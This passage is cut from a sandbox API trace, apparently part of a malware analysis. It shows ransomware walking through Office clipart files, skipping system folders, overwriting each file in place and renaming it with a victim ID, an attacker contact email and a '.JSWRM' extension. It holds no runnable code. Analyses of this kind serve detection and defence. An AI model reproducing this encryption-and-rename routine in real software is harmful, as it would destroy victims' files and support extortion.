0x22cdc8 [0092.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0092.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0092.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0092.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0092.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0092.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.602] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02446_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02446_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02446_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0092.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0092.603] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8a0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02448_.WMF", cAlternateFileName="")) returned 1 [0092.603] lstrcmpiW (lpString1="NA02448_.WMF", lpString2=".") returned 1 [0092.603] lstrcmpiW (lpString1="NA02448_.WMF", lpString2="..") returned 1 [0092.603] lstrcmpiW (lpString1="NA02448_.WMF", lpString2="...") returned 1 [0092.603] lstrcmpiW (lpString1="NA02448_.WMF", lpString2="windows") returned -1 [0092.603] lstrcmpiW (lpString1="NA02448_.WMF", lpString2="recovery") returned -1 [0092.603] lstrcmpiW (lpString1="NA02448_.WMF", lpString2="perflogs") returned -1 [0092.603] lstrcmpiW (lpString1="NA02448_.WMF", lpString2="documents and settings") returned 1 [0092.603] lstrcmpiW (lpString1="NA02448_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.603] lstrcmpiW (lpString1="NA02448_.WMF", lpString2="system volume information") returned -1 [0092.603] lstrcmpiW (lpString1="NA02448_.WMF", lpString2="msocache") returned 1 [0092.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02448_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02448_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02448_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02448_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02448_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02448_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0092.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.604] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2208) returned 1 [0092.604] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8a0) returned 0x20c6c0 [0092.604] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8a0, lpOverlapped=0x0) returned 1 [0092.605] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.605] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8a0, lpOverlapped=0x0) returned 1 [0092.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0092.606] CloseHandle (hObject=0x314) returned 1 [0092.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0092.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0092.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0092.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0092.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0092.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0092.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.606] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02448_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02448_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02448_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0092.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0092.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.607] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc28, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02450_.WMF", cAlternateFileName="")) returned 1 [0092.607] lstrcmpiW (lpString1="NA02450_.WMF", lpString2=".") returned 1 [0092.607] lstrcmpiW (lpString1="NA02450_.WMF", lpString2="..") returned 1 [0092.607] lstrcmpiW (lpString1="NA02450_.WMF", lpString2="...") returned 1 [0092.607] lstrcmpiW (lpString1="NA02450_.WMF", lpString2="windows") returned -1 [0092.607] lstrcmpiW (lpString1="NA02450_.WMF", lpString2="recovery") returned -1 [0092.607] lstrcmpiW (lpString1="NA02450_.WMF", lpString2="perflogs") returned -1 [0092.607] lstrcmpiW (lpString1="NA02450_.WMF", lpString2="documents and settings") returned 1 [0092.607] lstrcmpiW (lpString1="NA02450_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.607] lstrcmpiW (lpString1="NA02450_.WMF", lpString2="system volume information") returned -1 [0092.607] lstrcmpiW (lpString1="NA02450_.WMF", lpString2="msocache") returned 1 [0092.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02450_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02450_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02450_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0092.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02450_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02450_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02450_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0092.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0092.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0092.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02450_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.608] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3112) returned 1 [0092.608] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc20) returned 0x23fc98 [0092.608] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xc20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xc20, lpOverlapped=0x0) returned 1 [0092.610] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.610] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xc20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xc20, lpOverlapped=0x0) returned 1 [0092.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.610] CloseHandle (hObject=0x314) returned 1 [0092.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0092.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0092.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0092.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0092.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0092.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.610] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02450_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02450_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02450_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0092.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.611] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf74e1ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf74e1ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf74e1ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd70, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02451_.WMF", cAlternateFileName="")) returned 1 [0092.611] lstrcmpiW (lpString1="NA02451_.WMF", lpString2=".") returned 1 [0092.611] lstrcmpiW (lpString1="NA02451_.WMF", lpString2="..") returned 1 [0092.611] lstrcmpiW (lpString1="NA02451_.WMF", lpString2="...") returned 1 [0092.611] lstrcmpiW (lpString1="NA02451_.WMF", lpString2="windows") returned -1 [0092.611] lstrcmpiW (lpString1="NA02451_.WMF", lpString2="recovery") returned -1 [0092.611] lstrcmpiW (lpString1="NA02451_.WMF", lpString2="perflogs") returned -1 [0092.611] lstrcmpiW (lpString1="NA02451_.WMF", lpString2="documents and settings") returned 1 [0092.611] lstrcmpiW (lpString1="NA02451_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.611] lstrcmpiW (lpString1="NA02451_.WMF", lpString2="system volume information") returned -1 [0092.611] lstrcmpiW (lpString1="NA02451_.WMF", lpString2="msocache") returned 1 [0092.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0092.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02451_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02451_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02451_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0092.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0092.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02451_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02451_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02451_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0092.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0092.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0092.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02451_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.613] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3440) returned 1 [0092.613] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x23fc98 [0092.613] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0092.615] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.615] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0092.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.616] CloseHandle (hObject=0x314) returned 1 [0092.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0092.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0092.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0092.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0092.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0092.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.616] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02451_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02451_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02451_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0092.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0092.617] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: 